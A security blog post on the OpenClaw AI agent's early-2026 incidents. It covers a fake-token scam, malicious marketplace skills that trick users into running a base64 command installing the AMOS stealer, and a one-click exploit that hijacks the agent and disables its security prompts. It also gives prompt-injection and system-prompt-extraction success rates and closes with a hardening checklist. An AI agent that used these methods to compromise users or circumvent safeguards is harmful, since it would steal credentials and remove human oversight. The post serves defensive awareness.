LogoSu Jiang
  • Blog
  • Knowledge Base
  • About Me
OpenClaw (Clawdbot) Created the First Victims of AI Agents
2026/02/09

OpenClaw (Clawdbot) Created the First Victims of AI Agents

An open-source AI agent with 160K GitHub stars triggered a fake token scam, a malware supply chain attack, and mass credential leaks in just 10 days. This isn't a security incident — it's the first full exposure of a structural flaw in the AI agent category.

$16 Million Evaporated in 10 Seconds

On January 27, 2026, an Austrian developer released a Twitter handle. Ten seconds later, a professional scammer snatched it. Within hours, a fake token listed under that handle hit a $16 million market cap. Hours after that, it crashed over 90%.

The developer was Peter Steinberger. His open-source project Clawdbot hit 60,000 GitHub stars within three days of launching in November 2025. It passed 100,000 in a week. By late January 2026, it surpassed 160,000 stars and attracted 2 million visitors in a single week. It was an AI agent that could take over your computer — managing email, calendar, messaging apps, executing shell commands, reading and writing your file system.

Anthropic decided "Clawd" sounded too much like "Claude" and demanded a name change. Steinberger renamed it to Moltbot, then three days later to OpenClaw. Between those two renames, he needed to release the old @clawdbot handle to register new ones.

In that ten-second window, everything collapsed.

The snatcher got a handle with real followers, real post history, and a real avatar. They posted an "official Clawdbot governance token" called $CLAWD. Because the account looked 100% legitimate, thousands of users assumed it was real. FOMO plus Solana liquidity manipulation sent $CLAWD's market cap soaring.

Steinberger posted: "I will never do a coin. Any project that lists me as coin owner is a SCAM."

Too late. Following the typical Solana meme coin rug pull pattern, the operators cashed out 10-30% of the market cap before the crash. Ten percent of $16 million is $1.6 million. Time spent: under 24 hours.

Meanwhile, Twitter was flooded with "everyone's making money with Clawdbot" posts. One account described making "six-figure profits" on Polymarket with Clawdbot. Another claimed "Free ClawdBot is printing money on Polymarket... made about $460K." These posts weren't sharing experiences. They were manufacturing FOMO for the $CLAWD token.

OpenClaw: 72-Hour CollapseJanuary 27 → February 3, 2026Jan 27: Clawdbot → MoltbotSteinberger releases @clawdbot handlePreparing to register @moltbot10 Seconds Later: Handle SnatchedProfessional handle sniper hijacks @clawdbotPosts $CLAWD tokenHours Later: $CLAWD Hits $16MFOMO-driven retail investors pile inPolymarket "profit screenshots" fuel hypeSteinberger's Emergency Denial"I will never do a coin"$CLAWD crashes over 90%Jan 28: ClawHub Malicious Skills Found341 malicious skills discoveredAtomic Stealer (AMOS) deployed via pluginsJan 30: Rebranded to OpenClaw21,000+ instances exposed to internetAPI keys and chat logs fully accessibleFeb 3: CVE-2026-25253 DisclosedOne click gives full remote controlCVSS 8.8 · 52 countries affected30,000+ exposed instances · Security score: 2/100Sources: Forbes, SecurityWeek, ZeroLeaks, Hunt.io, NIST

The First Victims Didn't Get Hacked — They Voluntarily Handed Over the Keys

The $CLAWD token victims were a classic crypto fraud story. The second wave of victims is more interesting because they were technical users who thought they were making rational decisions.

OpenClaw has a skill marketplace called ClawHub, where users install extensions for their AI agent. The barrier to entry for publishing skills is remarkably low: a GitHub account older than one week, no code review process.

Security researchers discovered an attack campaign codenamed ClawHavoc. Koi Security audited 2,857 skills and found 341 malicious ones — a 12% infection rate. Another firm, SlowMist, reported 472 affected skills sharing the same attack infrastructure.

At least 14 individuals were identified as contributing malicious content, though some may have been compromised legitimate accounts. The most prolific, hightower6eu, uploaded 354 malicious packages focused on crypto analytics. Another actor, Sakaen736jih, was observed submitting new malicious skills every few minutes in early February using an automated deployment script. An established account, davidsmorais, uploaded a mix of legitimate and malicious skills — consistent with an account takeover.

Over 100 malicious skills masqueraded as crypto tools: Solana wallet trackers, Phantom wallet utilities, Ethereum gas monitors, Bitcoin blockchain analyzers, insider wallet finders. Another batch disguised as Polymarket prediction bots, precisely targeting the Clawdbot user base's interests.

The attack didn't execute malicious code directly. Instead, skills displayed a simulated error or "environment verification" prompt, instructing users to execute a base64-encoded terminal command to "fix" the issue. This command connected to attacker infrastructure at 91.92.242[.]30 and downloaded a second-stage dropper script. Security researchers call this technique ClickFix. Users thought they were fixing their environment. They were installing a backdoor.

The payload was Atomic macOS Stealer (AMOS), a 521KB universal Mach-O binary (x86_64 + arm64). It's sold on dark web Telegram channels for $500-1,000/month. AMOS uses runtime string decryption to evade static analysis, clears the quarantine attribute to bypass macOS Gatekeeper, and employs ptrace() and sysctl() to detect and evade debuggers.

Exfiltrated data was uploaded to socifiapp[.]com/api/reports/upload. The ClawHavoc campaign reached over 120 countries.

ClawHavoc Attack Chain AnatomyFrom "install a skill" to "wallet drained" in three stepsStep 1: DisguiseFake skills published on ClawHub"Solana Wallet Tracker" "Polymarket Prediction Bot""AI Trading Bot" "Ethereum Gas Monitor"Entry barrier: 1-week GitHub account · No code review14 actors · 1 uploaded 354 · 1 auto-submitting every minute↓Step 2: ClickFix Social EngineeringSimulated error, "fix your environment"User executes base64-encoded terminal commandConnects to 91.92.242[.]30, downloads dropperSecond-stage installs AMOS backdoor↓Step 3: Atomic Stealer HarvestsAMOS (521KB Mach-O binary)✗ 60+ crypto wallet seed phrases✗ Browser passwords, cookies, autofill✗ Full macOS Keychain dump✗ SSH keys, API keys, .env variablesExfil to socifiapp[.]com · MaaS: $500-1000/monthGatekeeper bypass + anti-debug + runtime string decryptionVictim profile: Technical users · Crypto holders · Open source trustInstalled productivity tools, got backdoors insteadSources: Koi Security, Bitdefender, The Hacker News, SlowMist

An Endpoint You've Probably Never Heard Of: /api/export-auth

Most coverage focused on CVE-2026-25253 and ClawHavoc. But there's an equally lethal issue that received almost no attention.

OpenClaw has an endpoint designed for backing up user credentials: /api/export-auth. The problem: it has no authentication or authorization checks whatsoever.

Anyone who can reach this endpoint — whether through an exposed gateway or via the CVE-2026-25253 one-click exploit — can extract all API tokens stored in your OpenClaw instance. OpenAI, Claude, Google AI. Plaintext. No encryption.

Hunt.io published a report on February 3: "Hunting OpenClaw Exposures: CVE-2026-25253 in Internet-Facing AI Agent Gateways." They identified over 17,500 exposed OpenClaw instances across 52 countries, 98.6% running on cloud infrastructure. By late January, that number grew past 21,000. By February 8, The Hacker News reported it had exceeded 30,000.

The CVE-2026-25253 kill chain is more sophisticated than most reports describe. Attackers don't just steal the auth token — they use Cross-Site WebSocket Hijacking to connect to the victim's OpenClaw instance, disable security prompts, and execute arbitrary shell commands on the host system. It's a complete kill chain from "click a link" to "full computer control."

Security engineer Lucas Valbuena's ZeroLeaks assessment became one of the most shared security tweets of the year. Overall score: 2/100. System prompt extraction rate: 84%. Prompt injection success rate: 91%.

Snyk found that 283 out of 3,984 ClawHub skills (7.1%) had design flaws that instructed the AI agent to write API keys, passwords, and credit card numbers in plaintext to output logs. These weren't malicious skills — just poorly written ones. The effect was the same.

OpenClaw Security DashboardMultiple independent audit results2/100Overall Security ScoreZeroLeaks · Critical91%Injection Success RateNearly Defenseless30,000+Exposed InstancesHunt.io · 52 countries · 98.6% cloud84%Prompt Extraction RateSystem prompt leaked on turn 1CVE-2026-25253CVSS 8.8Malicious link → WebSocket hijack → Token theft→ Disable security prompts → Host arbitrary execution/api/export-auth EndpointNo auth · Exports all AI service API tokens (plaintext)OpenAI · Claude · Google AI · All configured keysClawHub Marketplace283 of 3,984 skills (7.1%) leak credentialsNon-malicious design flaws · API keys/passwords in plaintext logsCisco: "An infostealer disguised as a personal assistant"Sources: ZeroLeaks, Hunt.io, DepthFirst, Snyk, Cisco, NIST

This Isn't a Problem You Can Patch

Daniel Miessler is known in the security community as an AI optimist — a "98% AI YOLO Maximalist." But on January 27, he posted: "I'm asking you to please listen to this. Here are some of the top security issues with clawd.bot that you all should be avoiding."

OpenClaw's security problems aren't the kind you fix by updating to the latest version. They represent a structural contradiction baked into the AI agent product category.

A useful AI agent needs access to your email, calendar, file system, and messaging apps. It needs to execute code, call APIs, and interact with web pages. Its value comes from having maximum permissions. Restricting permissions means restricting functionality.

Traditional software security is built on determinism — you audit the code, you know what it does. AI agents are non-deterministic. The same input can produce different outputs. You can't protect unpredictable software with traditional whitelists and firewalls.

CrowdStrike and Trend Micro released "Agentic AI Security Framework" reports in early 2026. Their conclusion: traditional security tools cannot protect non-deterministic AI agents. What's needed is an entirely new governance paradigm.


"Shadow AI" and the Numbers Keeping CISOs Awake

The $CLAWD scam hurt retail speculators. ClawHavoc hurt technical users. But enterprises may suffer the largest losses.

CISO survey data from 2026 reveals a disturbing reality: 71% of AI tools already have access to core business systems, but only 16% of organizations govern this access effectively. 92% of organizations lack full visibility into AI identity activity. 95% doubt their ability to detect AI misuse.

75% of CISOs have discovered unauthorized AI tools in their environments — tools with embedded credentials or elevated system access that aren't being monitored. CISOs now rank "shadow AI" as their number one security risk.

Why do employees do this? 60% of surveyed employees admitted they'd take security risks by using unauthorized AI tools to get work done faster. OpenClaw is exactly the kind of tool that's irresistible to install and try.

Then things get very bad. An employee installs OpenClaw on a work computer, grants it access to company email, code repositories, and internal docs. The gateway port is left open, authentication isn't configured, or a ClawHub skill with an AMOS backdoor gets installed. The company's source code, customer data, and internal communications get packaged and exfiltrated.

There's a cascading consequence most people don't know about: by Q3 2026, cyber insurance policies are expected to explicitly exclude AI agent-related breaches unless specific controls are demonstrated. 97% of organizations reporting AI-related incidents lacked proper access controls. In other words, if your company suffers a data breach because an employee deployed OpenClaw without authorization, insurance may not cover it.

CISO Survey: The Scale of Shadow AIEnterprise AI security governance in 202671%AI has core business accessOnly 16% governed effectively92%No visibility into AI identity95% can't detect AI misuse75%Found unauthorized AI toolsWith embedded credentials60%Employees willing to take risksUsing unauthorized AI toolsOpenClaw "Shadow AI" Attack ScenarioEmployee installs → Grants email/repo access → Gateway exposed→ Source code / customer data / internal comms exfiltratedCrowdStrike: AI agents amplify data exposure at machine speedCyber Insurance Excluding AI Agent Incidents2026 Q3: No specific controls = No coverage97% of orgs reporting AI incidents lacked access controlsThe CISO's dilemma: Ban AI → Fall behindAllow AI → Accept an ungovernable attack surfaceSources: Axis Capital, CrowdStrike, Kiteworks, BlackFog, The AI Counsel

If You Must Use It, Here's the Configuration That Can Save You

Steinberger partnered with Google VirusTotal to scan ClawHub skills, established vulnerability reporting, and hired the researcher who found the critical flaws. But the following configuration is on you. This isn't advice. It's a survival baseline.

Update immediately to v2026.1.29 or later. CVE-2026-25253 is patched in this version. Any earlier version is exploitable with a single click right now.

Then rotate every credential. If you used a vulnerable version and visited any untrusted website, assume all your API tokens are compromised. OpenAI, Claude, Google AI — rotate everything.

Deploy to an isolated environment. Don't run OpenClaw on your primary machine. Use a dedicated device, VPS, or virtual machine. DigitalOcean offers a hardened one-click deploy. If using Docker, add: --read-only (prevent filesystem writes), --security-opt=no-new-privileges (prevent privilege escalation), --cap-drop=ALL (remove all Linux capabilities).

Lock down the network. Never expose OpenClaw's ports (default 18789) to the public internet. Use Tailscale for private encrypted tunnels. If public access is unavoidable, place behind NGINX with strong auth and rate limiting. Verify gateway config auth is not none. Restrict outbound traffic to only necessary API endpoints (OpenAI, Anthropic) — block all other internet access to prevent exfiltration.

Set sandbox mode to maximum. OpenClaw's sandbox.mode controls which sessions run sandboxed. Set to non-main (sandboxes group chats and external channels) or all (sandboxes everything, safest but adds latency). Restrict high-risk tools exec, browser, web_fetch, web_search to trusted agents only.

Broker credentials, don't expose them. Don't let OpenClaw handle API tokens directly. Use OAuth brokering solutions (like Composio) to isolate sensitive credentials. Configure short-lived session tokens instead of permanent ones. OpenClaw has been found to store credentials in plaintext in local config files.

Lock down chat integrations. Never let your OpenClaw bot join public channels where strangers can send it messages. Restrict command acceptance to specific user IDs. Enable MFA on all integrated accounts.

Enable audit logging. Monitor every action OpenClaw executes. Watch for unexpected config changes and command execution. Treat all links, attachments, and pasted instructions from untrusted sources as hostile by default.


160K Stars ≠ Security

160,000 GitHub stars. 2 million weekly visitors. OpenClaw was one of the fastest-growing open-source projects of 2025.

But star count measures popularity, not security. High popularity made OpenClaw a more attractive attack target. Scammers chose it for the fake token, malware authors chose ClawHub as a distribution channel — all because the user base was large enough.

OpenClaw reveals a fundamental dilemma in the AI agent category. User value comes from maximizing permissions. Security risk also comes from maximizing permissions. There's no space for compromise.

You can't tell an AI agent "manage my email but don't read my email." You can't say "execute code but not malicious code." It can't tell the difference. It's non-deterministic. The same instruction in different contexts can produce entirely different behavior.

The configuration checklist above can't solve the fundamental contradiction. But it can move you from "near-certain to be attacked" to "at least not the easiest target." In an ecosystem where 30,000 instances are exposed to the public internet, that's already a significant advantage.


Sources: Forbes, The Hacker News, BleepingComputer, SecurityWeek, Snyk, CrowdStrike, Trend Micro, Bitdefender, ZeroLeaks, DepthFirst, Hunt.io, Cisco, Koi Security, SlowMist, Composio, NIST CVE Database

Disclaimer: This article does not constitute investment advice. All cryptocurrency tokens mentioned are confirmed scam projects.

All Posts

Author

avatar for Su Jiang
Su Jiang

Categories

  • AI探索
$16 Million Evaporated in 10 SecondsThe First Victims Didn't Get Hacked — They Voluntarily Handed Over the KeysAn Endpoint You've Probably Never Heard Of: /api/export-authThis Isn't a Problem You Can Patch"Shadow AI" and the Numbers Keeping CISOs AwakeIf You Must Use It, Here's the Configuration That Can Save You160K Stars ≠ Security

More Posts

GPT-5.2 Deep Analysis: The Truth Behind 390x Efficiency Gains
AI探索

GPT-5.2 Deep Analysis: The Truth Behind 390x Efficiency Gains

GPT-5.2 just launched and sparked controversy. 90.5% on ARC-AGI test sets a new record, costs dropped 390x. But Reddit users question: benchmark optimization or real improvement? This article breaks down the technical breakthroughs, real-world performance, and industry debates.

avatar for Su Jiang
Su Jiang
2025/12/12
苏江:分享个自制的公众号排版编辑器,适合保存AI生成的Markdown格式文档
AI探索

苏江:分享个自制的公众号排版编辑器,适合保存AI生成的Markdown格式文档

苏江:分享个自制的公众号排版编辑器,适合保存AI生成的Markdown格式文档

avatar for Su Jiang
Su Jiang
2025/07/27
I Went to Sleep, Woke Up to Finished Code
AI探索

I Went to Sleep, Woke Up to Finished Code

About Ralph Loop: a technique that lets AI autonomously execute tasks in a loop. $297 to complete a $50K contract. 3 months to generate an entire programming language.

avatar for Su Jiang
Su Jiang
2026/01/14

Need a Custom Solution?

Still stuck or want someone to handle the heavy lifting? Send me a quick message. I reply to every inquiry within 24 hours—and yes, simple advice is always free.

100% Privacy. No spam, just solutions.

Newsletter

Join the community

Subscribe to our newsletter for the latest news and updates

LogoSu Jiang

AI Developer · Writer · Investor | Exploring AI Applications

TwitterX (Twitter)Email

WeChat: iamsujiang

WeChat QR Code
Scan to add WeChat
Product
  • Features
  • Pricing
  • FAQ
Resources
  • Blog
  • Knowledge Base
Company
  • About Me
  • Contact
  • Waitlist
Legal
  • Cookie Policy
  • Privacy Policy
  • Terms of Service
© 2026 Su Jiang All Rights Reserved.